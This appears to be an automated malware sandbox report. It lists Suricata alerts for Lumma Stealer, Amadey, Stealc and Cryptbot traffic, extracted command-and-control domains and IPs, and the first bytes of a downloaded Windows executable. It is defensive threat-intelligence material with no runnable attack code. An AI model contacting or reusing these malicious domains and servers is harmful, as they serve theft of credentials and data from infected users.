                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50162 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50158 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50168 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50169 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50171 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50177 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.4:64282 -> 1.1.1.1:53
                              Source: Network trafficSuricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.4:52072 -> 1.1.1.1:53
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50180 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50174 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50181 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50189 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50186 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50222 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50223 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:50191
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50124 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:50144 -> 185.121.15.192:80
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50238 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50165 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50246 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50252 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50253 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50233 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50269 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50276 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50287 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50288 -> 185.215.113.206:80
                              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50302 -> 185.215.113.206:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50295 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50306 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50339 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50358 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50325 -> 185.215.113.206:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50366 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50386 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50372 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50357 -> 185.215.113.206:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50412 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50402 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50406 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50416 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50447 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50451 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50428 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50460 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50455 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50476 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50435 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50472 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50489 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:50498 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50504 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50501 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50508 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2058397 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pancakedipyps .click) : 192.168.2.4:56639 -> 1.1.1.1:53
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50500 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50509 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:50505
                              Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:50517 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:50527 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:50526 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50528 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:50497
                              Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:50533 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50496 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50521 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50547 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:50541 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:50520 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:50523 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50542 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50572 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50567 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:50568
                              Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:50544 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50608 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50610 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:50605
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50595 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50580 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50604 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50562 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50623 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50558 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50637 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50642 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50617 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50665 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50584 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50669 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50673 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50571 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50681 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50650 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50598 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50677 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50685 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50646 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50654 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49814 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49814 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49823 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49823 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49831 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49831 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49822 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49806 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49806 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49875 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49852 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49897 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50060 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50060 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50068 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50068 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50120 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50120 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:50141 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50185 -> 104.21.89.115:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50185 -> 104.21.89.115:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50186 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50128 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50128 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50180 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50180 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:50222 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50189 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50189 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50240 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50240 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:50250 -> 104.21.89.115:443
                              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50205 -> 104.21.89.115:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50205 -> 104.21.89.115:443
                              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:50264 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50287 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:50276 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50304 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50298 -> 104.21.89.115:443
                              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50247 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50247 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50517 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50517 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50520 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50520 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50544 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50614 -> 104.21.89.115:443
                              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:50526 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50614 -> 104.21.89.115:443
                              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:50633 -> 104.21.89.115:443
                              Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:50541 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50639 -> 104.21.89.115:443
                              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50616 -> 104.21.89.115:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50616 -> 104.21.89.115:443
                              Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:50636 -> 104.21.89.115:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50174 -> 104.21.21.99:443
                              Source: Malware configuration extractorURLs: cheapptaxysu.click
                              Source: Malware configuration extractorURLs: necklacebudi.lat
                              Source: Malware configuration extractorURLs: aspecteirs.lat
                              Source: Malware configuration extractorURLs: crosshuaht.lat
                              Source: Malware configuration extractorURLs: rapeflowwj.lat
                              Source: Malware configuration extractorURLs: discokeyus.lat
                              Source: Malware configuration extractorURLs: sustainskelet.lat
                              Source: Malware configuration extractorURLs: grannyejh.lat
                              Source: Malware configuration extractorURLs: energyaffai.lat
                              Source: Malware configuration extractorIPs: 185.215.113.43
                              Source: unknownDNS query: name: api.telegram.org
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 22 Dec 2024 01:16:11 GMTContent-Type: application/octet-streamContent-Length: 2668544Last-Modified: Sat, 21 Dec 2024 08:45:32 GMTConnection: keep-aliveETag: "6766802c-28b800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 25 ca 47 72 61 ab 29 21 61 ab 29 21 61 ab 29 21 13 2a 2a 20 6c ab 29 21 13 2a 2c 20 f5 ab 29 21 13 2a 2d 20 72 ab 29 21 70 2d 2a 20 73 ab 29 21 70 2d 2d 20 71 ab 29 21 70 2d 2c 20 47 ab 29 21 13 2a 28 20 64 ab 29 21 61 ab 28 21 3f ab 29 21 e2 2d 21 20 60 ab 29 21 e2 2d d6 21 60 ab 29 21 e2 2d 2b 20 60 ab 29 21 52 69 63 68 61 ab 29 21 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 f4 a8 65 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 2a 00 aa 26 00 00 1c 02 00 00 00 00 00 50 a5 23 00 00 10 00 00 00 c0 26 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 29 00 00 04 00 00 be fd 28 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 aa 27 00 3c 00 00 00 00 f0 27 00 7d 9e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 28 00 b8 6a 00 00 00 9c 27 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 9b 27 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 aa a8 26 00 00 10 00 00 00 aa 26 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 2c f1 00 00 00 c0 26 00 00 f2 00 00 00 ae 26 00 00 00 00 00 00 00 00 00 00 00 00 